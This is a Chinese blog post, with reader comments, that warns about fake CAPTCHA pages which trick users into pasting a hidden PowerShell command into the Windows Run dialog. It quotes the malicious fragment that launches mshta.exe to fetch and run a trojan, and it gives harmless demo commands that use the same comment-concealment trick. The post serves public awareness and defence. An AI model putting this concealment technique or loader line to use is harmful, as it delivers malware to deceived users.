警惕:一种新型社交工程学挂马方案 — 眼见不一定为真

昨天晚上刷微博的时候,看到教主发的《现在黑产有一种新的社交工程学挂马方案》 ,虽然技术不高深,但是迷惑性还是蛮大的。也是因为看不懂教主发的微博,让我时常自惭形秽。

看描述,应该是在访问一些网站的时候会弹出人机验证的界面,根据截图看来应该是国外的网站,国内网站未为可知,或者也有。当然,这种网站基本都不可能是什么正规网站,即使现在中文网站没用这些技术,可能过几天也就出了中文版本了。

基于这种验证,在弹出这个窗口的时候页面已经将要粘贴到文本内容写入了粘贴板,此时你按照页面提示,按下键盘的 Win +R 键,此时会弹出运行窗口,然后,你再按 Ctrl +v 粘贴验证文本,此时运行窗口就变成了下面的样子:

真的不同的 windows 版本(系统设置)可能前面的选择框样式有所区别,但是看起来似乎没什么问题对不对?

此时你要执行第三步了,按键盘的 Enter 或者点击确定。点了之后,一个黑窗口出来又消失了,似乎没什么变化,然而,就在这时候,你已经下载了黑客的木马文件并且执行了,而这个操作,火绒似乎也不会有什么反应。

那么问题出在什么地方呢?当然是你复制到运行窗口内的那段文字,实际上全部内容应该是类似下面的样子:

然而,这段经过精心设计的问题,在粘贴到运行窗口之后。由于运行窗口默认显示机制是显示最后的文本,那么刚好就显示了想让你看到的那一段:

✅ 'I am not a robot: CAPTCHA Verification UID: 1314

让你自以为是在做验证,然而,这一句是注释,真正有用的是前面的这一段:

Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine=('ms' + 'hta' + '.exe '+$l)}

通过 mshta.exe 加文件路径反问文件并且执行。那么知道怎么实现的,我稍微改造了一下,不会产生任何的危害,也可以测试下效果。

例如复制下面这段,运行之后会打开计算器:

powershell -w 1 -C "$l='https://oba.by/';Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine=('cal' + 'c' + '.exe ')}" # ✅ 'I am not a robot: CAPTCHA Verification UID: 1314'

运行效果:

下面这行命令会在运行之后直接打开我的博客:

powershell -w 1 -C "$l='https://oba.by/';Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine=('C:\Program Files\Internet Explorer\iexplor' + 'e' + '.exe  https://oba.by')}" # ✅ 'I am not a robot: CAPTCHA Verification UID: 1314'

运行效果:

要解决这个问题,最简单的是不要在脱离当前程序运行任何命令,当然,也可以按照教主的做法,直接禁用运行:

Win+R,输入 gpedit.msc 运行。然后打开[用户配置] -> [管理模板] -> [“开始”菜单和任务栏],找到[从“开始”菜单中删除“运行”菜单],双击打开,选择“已启用”。

设置之后再次按 win +R 就会出现下面的提示:

如果要恢复功能,在开始菜单直接搜索gpedit.msc,点击运行之后将选项改为未配置或者已禁用即可。

简而言之,上网要小心,眼见不一定为真,不然,哪里有那么多的美女呢!祝大家情人节快乐啊!

☆版权☆

* 网站名称:obaby@mars
* 网址:https://obaby.org.cn/
* 个性:https://oba.by/
* 本文标题: 《警惕:一种新型社交工程学挂马方案 — 眼见不一定为真》
* 本文链接:https://obaby.org.cn/2025/02/19271
* 短链接:https://oba.by/?p=19271
* 转载文章请标明文章来源,原文标题以及原文链接。请遵从 《署名-非商业性使用-相同方式共享 2.5 中国大陆 (CC BY-NC-SA 2.5 CN) 》许可协议。


You may also like

64 comments

  1.  Level 6
    IBrowse r IBrowse r Android 12 Android 12 cn中国–河南–漯河 联通

    这种我还没见过,人机验证倒是挺常见,看来是我访问的网站还不够多。 laugh1

    1.  Level 6
      WebView 4 WebView 4 Android 12 Android 12 cn中国–广东–广州 电信

      天哪,现在的人机校验都这么高级了,不过只能骗小白,有经验的会疑问输入验证码为什么要打开win + R,没必要啊,而且是这是执行程序,就马上起戒备心了,就不搞了,哈哈哈

  2. Level 6
    Google Chrome 109 Google Chrome 109 Windows 10 Windows 10 cn中国–上海–上海 腾讯云

    灵妹妹,那件衣服勒不勒?

  3. Level 4
    Google Chrome 132 Google Chrome 132 Windows 10 Windows 10 cn中国–台湾 中华电信(HiNet)数据中心

    禁用运行可还行……怎么不干脆把PowerShell给一起禁了。

    1. 公主 Queen 
      Google Chrome 126 Google Chrome 126 Mac OS X 10.15 Mac OS X 10.15 cn中国–山东–青岛 联通

      当然也行,更彻底啊。多数人也不会用 ps。
      更直接换 mac 或者 linux 也可以的啦。

  4. Level 5
    Google Chrome 132 Google Chrome 132 Windows 11 Windows 11 cn中国–广东–东莞 联通

    验证是否robot还要让人配合按键,明目张胆的叫人win+R,懂一些电脑的应该会提防着。

    1. Level 1
      Google Chrome 133 Google Chrome 133 Windows 11 Windows 11 us美国

      这个一般是,先放一些足够吸引人的内容题目,然后让你反复验证失败(比如谷歌红绿灯)当你反复失败到暴躁时,再告诉你可能是因为你的浏览器版本问题,请用另一种不需要浏览器的验证方式,再说手动操作配合按键,说的充斥一些专业术语让人云里雾里的,只是懂一些的就会信任它了。

      1. 公主 Queen 
        Google Chrome 126 Google Chrome 126 Mac OS X 10.15 Mac OS X 10.15 cn中国–山东–青岛 联通

        的确,网站内容只要有足够的吸引力就有人愿意铤而走险。

    2. 公主 Queen 
      Google Chrome 126 Google Chrome 126 Mac OS X 10.15 Mac OS X 10.15 cn中国–山东–青岛 联通

      然而,现在的年轻人都是手机重度用户,至于电脑?多数人都不咋懂。

    1. 公主 Queen 
      Google Chrome 126 Google Chrome 126 Mac OS X 10.15 Mac OS X 10.15 cn中国–山东–青岛 联通

      说实话,我不大相信,哈哈哈。
      看来是更新策略了?

        1. 公主 Queen 
          Google Chrome 126 Google Chrome 126 Mac OS X 10.15 Mac OS X 10.15 cn中国–山东–青岛 联通

          下载了个火绒看了下,病毒库最后更新是昨天下午。应该是更新规则了

  5. Level 4
    Google Chrome 131 Google Chrome 131 Windows 10 Windows 10 cn中国–山东–青岛 联通

    不少验证都是鼠标点一下就行。
    用到键盘的以后得小心谨慎了。
    这个设计确实不错。
    不过这种验证复杂,不发钱,我估计懒得操作。

    1. Level 4
      Google Chrome 132 Google Chrome 132 Windows 10 Windows 10 cn中国–四川–成都 电信

      现在ai这么发达,人机对抗训练越来越复杂,以后说不定还真得用键盘

  6.  Level 5
    Google Chrome 130 Google Chrome 130 Windows 10 Windows 10 cn中国–上海–上海 电信

    啊 最近的电脑病毒好像技术含量越来越低了

  7.  Level 6
    Microsoft Edge 133 Microsoft Edge 133 GNU/Linux GNU/Linux cn中国–北京–北京 移动/中国移动北京分公司

    Linux主系统,不怕病毒,也找不到杀毒软件~

      1. 公主 Queen 
        Google Chrome 126 Google Chrome 126 Mac OS X 10.15 Mac OS X 10.15 cn中国–山东–青岛 联通

        所以是识别对了?
        用的纯真的数据库。

                1. Level 1
                  Google Chrome 132 Google Chrome 132 Windows 10 Windows 10 us美国–加利福尼亚州–洛杉矶–洛杉矶 IT7网络

                  改成插件了吗?看了下还不错,就是要拖着个composer的大尾巴(vendor目录),先down下来备用。感谢分享~

                  1. 公主 Queen 
                    Google Chrome 126 Google Chrome 126 Mac OS X 10.15 Mac OS X 10.15 cn中国–山东–青岛 联通

                    不用,插件都继承了,在插件目录内,无需composer 导入。

  8. Level 4
    Microsoft Edge 133 Microsoft Edge 133 Windows 10 Windows 10 cn中国–北京–北京 移动/数据上网公共出口

    这……我觉得会点电脑的,不能上这个当吧。

  9.   Level 4
    Google Chrome 132 Google Chrome 132 Windows 11 Windows 11 cn中国–江西 移动/数据上网公共出口

    然鹅 我命令都是powershell执行的 前面都看得见

    1. 公主 Queen 
      Google Chrome 130 Google Chrome 130 Windows 10 Windows 10 cn中国–山东–青岛 联通

      不上各种下载网站,涩涩网站就会降低很大概率

  10. Level 5
    Google Chrome 133 Google Chrome 133 Windows 10 Windows 10 cn中国–陕西–西安 联通

    嘶,可能我看起来很简单,但是如果换成中文,家里人可能还真会中招嘞

  11. Level 2
    Microsoft Edge 133 Microsoft Edge 133 Windows 11 Windows 11 cn中国–上海–上海–普陀区 电信

    在 B 站看视频,正好看到你发的视频,就到了这里。
    真正的 CAPTCHA 验证是让你选图片,而不是输入打开运行,输入代码。

    1. 公主 Queen 
      Google Chrome 130 Google Chrome 130 Android 10 Android 10 cn中国–山东–青岛 联通

      弱弱的问个问题,你的昵称里的那个cdm是那个cdm的意思吗?🤫

      1. Level 2
        Microsoft Edge 133 Microsoft Edge 133 Windows 10 Windows 10 cn中国–广东–湛江–霞山区 移动

        你说的cdm是什么意思,受还是,性取向?受的话确实有点但是没那么夸张,算是心理问题的附赠品。。
        但是我不喜欢穿着异性的衣服来表达自己,不会做一些奇怪的事情或者是不符合正常人的行为。

        1. 公主 Queen 
          Google Chrome 130 Google Chrome 130 Android 10 Android 10 cn中国–山东–青岛 联通

          心理性别的认同感吧,毕竟现在这些东西也比较小众。

  12. Level 3
    Google Chrome 127 Google Chrome 127 GNU/Linux GNU/Linux cn中国–贵州–黔南布依族苗族自治州 联通

    看不到摸不着用不到的东西不会去接触的 除非真的非常需要 或者感兴趣 总而言之 小心为好

  13. Level 1
    Microsoft Edge 133 Microsoft Edge 133 Android 10 Android 10 cn中国–香港 LARUS

    前几天整了这个人机验证 我还说现在的人机验证这么高级了 结果今天凌晨steam就被盗刷了

    1. 公主 Queen 
      Google Chrome 126 Google Chrome 126 Mac OS X 10.15 Mac OS X 10.15 cn中国–山东–青岛 联通

      啊,这是受害人现身说法吗?宝子上网注意安全哦。
      以后多来姐姐的博客看看,😁

  14. Level 2
    Google Chrome 122 Google Chrome 122 Windows 11 Windows 11 cn中国–广东–佛山 电信

    看到要按Win+R的操作就得警惕了,验证码哪需要调用系统命令啊…

    1. 公主 Queen 
      Google Chrome 132 Google Chrome 132 Mac OS X 10.15 Mac OS X 10.15 cn中国–山东–青岛 联通

      嗯嗯,但是,还会有人上当啊,
      评论区已经出现受害者了。

  15. Level 4
    Google Chrome 132 Google Chrome 132 Windows 10 Windows 10 cn中国–四川–成都 电信

    防不胜防,一般人还真容易中招(不过说起这个recaptcha本身就是一个收集用户习惯的东东早脱里真人验证了 pardon

    1. 公主 Queen 
      Google Chrome 132 Google Chrome 132 Mac OS X 10.15 Mac OS X 10.15 cn中国–山东–青岛 联通

      是的,尤其是对于不那么专业的人来说

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注